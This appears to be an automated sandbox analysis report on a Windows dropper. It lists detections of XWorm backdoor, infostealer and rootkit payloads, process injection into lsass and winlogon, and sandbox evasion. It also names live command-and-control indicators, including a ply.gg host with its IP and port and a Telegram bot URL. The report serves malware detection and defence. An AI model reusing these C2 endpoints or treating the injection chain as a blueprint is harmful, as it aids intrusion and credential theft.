                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539526 Sample: aoKTzGQSRP.exe Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 85 subscribe-bond.gl.at.ply.gg 2->85 87 ip-api.com 2->87 89 dashboard.botghost.com 2->89 105 Suricata IDS alerts for network traffic 2->105 107 Found malware configuration 2->107 109 Malicious sample detected (through community Yara rule) 2->109 111 32 other signatures 2->111 10 aoKTzGQSRP.exe 3 2->10         started        13 powershell.exe 2->13         started        16 Deadsvchost.exe 2->16         started        18 3 other processes 2->18 signatures3 process4 file5 75 C:\Users\user\AppData\...\CMaker 2.0.exe, PE32+ 10->75 dropped 77 C:\Users\user\AppData\Local\Temp\1.exe, PE32 10->77 dropped 20 1.exe 5 10->20         started        24 CMaker 2.0.exe 40 10->24         started        129 Writes to foreign memory regions 13->129 131 Modifies the context of a thread in another process (thread injection) 13->131 133 Found suspicious powershell code related to unpacking or dynamic code loading 13->133 135 Injects a PE file into a foreign processes 13->135 26 dllhost.exe 13->26         started        28 conhost.exe 13->28         started        137 Antivirus detection for dropped file 16->137 139 Multi AV Scanner detection for dropped file 16->139 141 Machine Learning detection for dropped file 16->141 30 WerFault.exe 18->30         started        signatures6 process7 file8 61 C:\Users\Public\DeadXClient.exe, PE32 20->61 dropped 63 C:\Users\Public\DeadROOTkit.exe, PE32 20->63 dropped 65 C:\Users\Public\DeadCodeRootKit.exe, PE32 20->65 dropped 113 Antivirus detection for dropped file 20->113 115 Multi AV Scanner detection for dropped file 20->115 117 Machine Learning detection for dropped file 20->117 127 2 other signatures 20->127 32 DeadXClient.exe 1 5 20->32         started        37 DeadROOTkit.exe 14 2 20->37         started        39 DeadCodeRootKit.exe 1 20->39         started        67 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 24->67 dropped 69 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 24->69 dropped 71 C:\Users\user\AppData\Local\...\python311.dll, PE32+ 24->71 dropped 73 17 other files (16 malicious) 24->73 dropped 41 CMaker 2.0.exe 1 24->41         started        43 conhost.exe 24->43         started        119 Injects code into the Windows Explorer (explorer.exe) 26->119 121 Writes to foreign memory regions 26->121 123 Creates a thread in another existing process (thread injection) 26->123 125 Injects a PE file into a foreign processes 26->125 45 winlogon.exe 26->45 injected 47 lsass.exe 26->47 injected 49 svchost.exe 26->49 injected 51 20 other processes 26->51 signatures9 process10 dnsIp11 79 subscribe-bond.gl.at.ply.gg 147.185.221.21, 28600, 49766, 49817 SALSGIVERUS United States 32->79 59 C:\Users\Public\Deadsvchost.exe, PE32 32->59 dropped 91 Antivirus detection for dropped file 32->91 93 Multi AV Scanner detection for dropped file 32->93 95 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 32->95 103 2 other signatures 32->103 53 schtasks.exe 32->53         started        81 ip-api.com 208.95.112.1, 49729, 80 TUT-ASUS United States 37->81 97 Machine Learning detection for dropped file 37->97 99 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 37->99 101 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 37->101 55 WerFault.exe 37->55         started        83 dashboard.botghost.com 188.114.97.3, 443, 49713 CLOUDFLARENETUS European Union 41->83 file12 signatures13 process14 process15 57 conhost.exe 53->57         started       

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        aoKTzGQSRP.exe76%ReversingLabsWin32.Dropper.Dapato
                        aoKTzGQSRP.exe100%AviraTR/Dropper.Gen
                        aoKTzGQSRP.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\Public\DeadROOTkit.exe100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Local\Temp\1.exe100%AviraTR/Dropper.Gen2
                        C:\Users\Public\DeadCodeRootKit.exe100%AviraTR/Dropper.MSIL.Gen
                        C:\Users\Public\Deadsvchost.exe100%AviraHEUR/AGEN.1305769
                        C:\Users\Public\DeadXClient.exe100%AviraHEUR/AGEN.1305769
                        C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe100%AviraTR/Redcap.xbbft
                        C:\Users\Public\DeadROOTkit.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1.exe100%Joe Sandbox ML
                        C:\Users\Public\DeadCodeRootKit.exe100%Joe Sandbox ML
                        C:\Users\Public\Deadsvchost.exe100%Joe Sandbox ML
                        C:\Users\Public\DeadXClient.exe100%Joe Sandbox ML
                        C:\Users\Public\DeadCodeRootKit.exe92%ReversingLabsByteCode-MSIL.Infostealer.Tinba
                        C:\Users\Public\DeadROOTkit.exe81%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                        C:\Users\Public\DeadXClient.exe87%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                        C:\Users\Public\Deadsvchost.exe87%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                        C:\Users\user\AppData\Local\Temp\1.exe74%ReversingLabsByteCode-MSIL.Trojan.IPCheckDCRat
                        C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe34%ReversingLabsWin64.Trojan.Cerbu
                        C:\Users\user\AppData\Local\Temp\_MEI48002\VCRUNTIME140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_bz2.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_cffi_backend.cp311-win_amd64.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_ctypes.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_decimal.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_hashlib.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_lzma.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_queue.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_socket.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_ssl.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md.cp311-win_amd64.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md__mypyc.cp311-win_amd64.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\libcrypto-3.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\libffi-8.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\libssl-3.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\python3.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\python311.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\select.pyd0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\_MEI48002\unicodedata.pyd4%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        http://ip-api.com0%URL Reputationsafe
                        http://crl.dhimyotis.com/certignarootca.crl0%URL Reputationsafe
                        http://curl.haxx.se/rfc/cookie_spec.html0%URL Reputationsafe
                        http://ocsp.accv.es0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://httpbin.org/get0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        https://go.micro0%URL Reputationsafe
                        https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        https://httpbin.org/0%URL Reputationsafe
                        http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%URL Reputationsafe
                        http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
                        http://wwwsearch.sf.net/):0%URL Reputationsafe
                        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                        http://www.accv.es000%URL Reputationsafe
                        http://crl.securetrust.com/SGCA.crl0%URL Reputationsafe
                        https://httpbin.org/post0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        http://www.firmaprofesional.com/cps00%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                        http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
                        http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
                        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-60%URL Reputationsafe
                        http://www.quovadisglobal.com/cps00%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                        http://repository.swisssign.com/0%URL Reputationsafe
                        http://nuget.org/NuGet.exe0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        dashboard.botghost.com
                        		188.114.97.3
                        		truefalse
                          		unknown
                          subscribe-bond.gl.at.ply.gg
                          		147.185.221.21
                          		truetrue
                            		unknown
                            ip-api.com
                            		208.95.112.1
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              updates-full.gl.at.ply.ggtrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://api.telegram.org/bot1.exe, 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmpfalse
                                    		unknown
                                    https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#CMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://github.com/pyca/cryptography/actions?query=workflow%3ACICMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://tools.ietf.org/html/rfc2388#section-4.4CMaker 2.0.exe, 00000005.00000003.2239700913.0000022D34AAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234513191.0000022D34AA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2239428918.0000022D34AAC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232148885.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2239829401.0000022D34AAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://www.apache.org/licenses/LICENSE-2.0CMaker 2.0.exe, 00000002.00000003.2156350024.00000218C018E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C018E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64CMaker 2.0.exe, 00000005.00000003.2172273654.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231869727.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172905632.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257514118.0000022D34DEC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175839153.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229086639.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2243720980.0000022D34DE4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2243030617.0000022D34DCA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232613398.0000022D34DBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2237820216.0000022D34DC3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232547754.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://requests.readthedocs.ioPCMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://ip-api.comDeadROOTkit.exe, 00000007.00000002.2316235027.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963CMaker 2.0.exe, 00000005.00000003.2176043917.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257904597.0000022D34F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://cacerts.digiCMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://peps.python.org/pep-0205/CMaker 2.0.exe, 00000005.00000002.2256796014.0000022D34B40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://crl.dhimyotis.com/certignarootca.crlCMaker 2.0.exe, 00000005.00000003.2226979229.0000022D3531E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://curl.haxx.se/rfc/cookie_spec.htmlCMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259985977.0000022D35440000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://ocsp.accv.esCMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2238078413.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234701009.0000022D34CD0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244950158.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257114555.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDeadXClient.exe, 00000006.00000002.3473575665.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2322203406.000001DE64631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://rentry.coCMaker 2.0.exe, 00000005.00000002.2256796014.0000022D34B40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyCMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256074496.0000022D34688000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://httpbin.org/getCMaker 2.0.exe, 00000005.00000003.2225582122.0000022D351CE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228425828.0000022D35248000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://crl.xrampsecurity.com/XGCA.crlHCMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://go.micropowershell.exe, 00000009.00000002.2322203406.000001DE65B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://wwww.certigna.fr/autorites/0mCMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227665818.0000022D3531F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226979229.0000022D3531E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerCMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://github.com/python/cpython/issues/86361.CMaker 2.0.exe, 00000005.00000003.2170943791.0000022D34AD9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170622659.0000022D34D5E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2246985261.0000022D34AC2000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172194945.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256607534.0000022D34AC2000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236343248.0000022D34ABF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234194053.0000022D34AB7000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225465109.0000022D34AB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://contoso.com/Iconpowershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://httpbin.org/CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.apache.org/licenses/CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainCMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://wwww.certigna.fr/autorites/CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228360030.0000022D35308000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227580018.0000022D352F0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlCMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://dashboard.botghost.com/api/public/tools/user_lookup/10773009346920490670YCMaker 2.0.exe, 00000005.00000002.2256204504.0000022D34840000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535CMaker 2.0.exe, 00000005.00000003.2231869727.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241810301.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2248531599.0000022D34DB5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175839153.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232649259.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229086639.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2240132556.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232613398.0000022D34DBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2233299609.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232547754.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://cryptography.io/en/latest/installation/CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syCMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://www.python.org/psf/license/CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2262592946.00007FFD8FBD8000.00000040.00000001.01000000.00000009.sdmpfalse
                                                                                        		unknown
